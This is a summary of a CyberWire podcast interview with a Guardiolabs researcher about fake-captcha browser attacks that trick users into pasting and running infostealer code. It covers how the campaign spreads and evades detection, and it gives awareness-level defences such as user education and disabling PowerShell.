CyberWire Daily – "Browser attacks without downloads" [Research Saturday]

Date: September 20, 2025
Host: Dave Bittner (A), N2K Networks
Guest: Nati Tal (B), Head of Guardiolabs

Episode Overview

This Research Saturday episode delves into the evolution of browser-based threats—specifically, a campaign researchers have dubbed "captchageddon," which weaponizes browser captchas to trick users into unwittingly running malicious code. Rather than relying on traditional downloads, these attacks hijack familiar user flows and psychological conditioning to gain access and steal information. Dave Bittner (host) speaks with Nati Tal from Guardiolabs about how these attacks work, their propagation, evasion tactics, and strategies for protection.

Key Discussion Points and Insights

1. Anatomy of the Browser-Based Attack (Captchageddon)

• Social Engineering with Familiar Flows:
  Attackers use fake captchas, a ubiquitous web element, to gain user trust and trick them into running code.

  • Quote:

    “This type of attack is trying to fool the visitors of a website to do something that they used to do, like updating their browser in the early phases with a clear fake or in this case solving a captcha."
    — Nati Tal [01:43]

• How it Works:

  • The user encounters a captcha (either as a popup or page overlay) asking for unusual interactions—often keyboard shortcuts.
  • Malicious code is quietly copied to the clipboard.
  • Instructions urge the user to open a run window (on Windows), paste, and execute, thinking they're verifying human presence.
  • The result: infostealer malware is silently installed, compromising browser data, credentials, and potentially banking details.
    • Quote:

      “You actually open up the run window in Your Windows system, you paste that malicious code into it and press enter to execute it… it's all done in a matter of milliseconds."
      — Nati Tal [02:32]

2. Evolution of Attack Delivery

• From Malvertising to Compromised Legit Sites:

  • Initially, attackers used "malvertising"—serving malicious captchas as popups from gray-area streaming and download sites.
  • The strategy shifted as attackers sought more lucrative victims. They started injecting scripts into legitimate (often WordPress-based) websites via compromises, increasing their reach and user trust.
    • Quote:

      “They compromise those websites... inject their own scripts... captcha is popping up on your screen, which is again, quite usual to see... you also trust the website because you know this website, it's legit, it's well known.”
      — Nati Tal [04:34]

• Leveraging Trust by Mimicry:
  Attackers brand the fake captchas with site logos to maximize legitimacy, making it harder for users to spot the deception.

3. Psychological Tactics—Conditioning and Reflexive Actions

• Lowered Defenses through Familiarity:
  Captchas are a “trusted nuisance,” so users act reflexively, often without questioning authenticity.

  • Quote:

    “We hardly notice them when they pop up and we sort of reflexively click where we need to click and try to move on.”
    — Dave Bittner [08:52]

• Effectiveness:
  The attack exploits this monotonous task—users are “conditioned to complete them” and may not notice subtle differences.

4. Spread and Targeting

• Global to Focused Reach:

  • Started as a broad, global “spray and pray” campaign via malvertising.
  • Has become more focused: attackers now compromise popular, high-traffic sites, and even use social media campaigns and targeted ads (e.g., Facebook “recipe” links requiring captchas).
    • Quote:

      “We even saw some sponsored posts in Facebook about some recipes for cookies or something like that. But the link there goes to a captcha... allows attackers... to target specific people.”
      — Nati Tal [13:05]

• Industry-Specific Targeting:

  • Notably, Booking.com hosts/owners have been specifically targeted through phishing campaigns using the captcha ploy—giving the attack more legitimacy than standard fake login pages.

5. Evasion and Persistence Tactics

• Technical Evolution:

  • Early campaigns used plain, detectable HTML and PowerShell code.
  • Attackers now generate unique, obfuscated scripts per page load, use caps/lowercase obfuscation, and redirect to multiple pages to evade security tools.
    • Quote:

      “They are actually generating those kinds of scams on the fly... redirecting to different kinds of pages along the way…”
      — Nati Tal [16:19]

• Continuous Arms Race:
  Security firms and attackers are locked in an ongoing cycle of attack and defense.

6. Defensive Recommendations

• Awareness & Education:

  • Teach users and employees to be suspicious of captchas that demand unusual actions—especially running code or opening system dialogs.
    • Quote:

      “Being familiar with this kind of attack is the most important part… if they were aware that this type of attack is here... it's the foremost important part of mitigating it.”
      — Nati Tal [18:29]

• Technical Controls:

  • Disable PowerShell for non-technical users/enterprise endpoints via registry or policy—most users don’t need it.
  • Employ robust, layered endpoint security solutions beyond browser and OS defaults.
    • Quote:

      "We really need something more powerful in between that will know to catch those types of attacks before they hit us.”
      — Nati Tal [18:29]

Notable Quotes & Memorable Moments

• On Social Engineering:

  “Captcha is unfortunately a brilliant decision by them because captchas are all around everywhere and so easy to replica to fake them.”
  — Nati Tal [09:19]

• On Infamous Origins:

  "I love John Hammond, he's a good friend. But for the history, I guess he will be known as the one that presented this fake captcha to the world, although it kind of just enhanced it because he already saw this kind of attack in the wild."
  — Nati Tal [09:19]

• On Continuous Threat:

  “It will continue forever as long as they are able to get value from this kind of attack… it's here for more than... almost two years now I think from the very first time we saw that and it's here to stay.”
  — Nati Tal [16:19]

Key Timestamps for Important Segments

• [01:43] — Introduction to the attack and how it exploits familiar actions like captchas.
• [02:32] — Detailed walkthrough of how the attack manipulates users into running code.
• [04:34] — Evolution from malvertising to compromising legitimate websites.
• [09:19] — Discussion of psychological tricks and the role of social engineering.
• [13:05] — Spread, targeted audiences, and sector-specific campaigns.
• [16:19] — Technical evolution of the attack and evasion techniques.
• [18:29] — Recommendations for mitigation: user and enterprise strategies.

Conclusion

This episode of Research Saturday spotlights a dangerous evolution in browser-based attacks: the weaponization of familiar user-flow via fake captchas. The tactics leverage both technical evasion and psychological conditioning, moving from malvertising to widescale compromise of legitimate, high-traffic sites. Nati Tal emphasizes the critical importance of awareness, technical controls (like disabling PowerShell), and strong security layers to protect both organizations and individuals as these attacks become ever more sophisticated.

For Further Reading:
See show notes for a link to Guardiolabs' detailed research on this threat.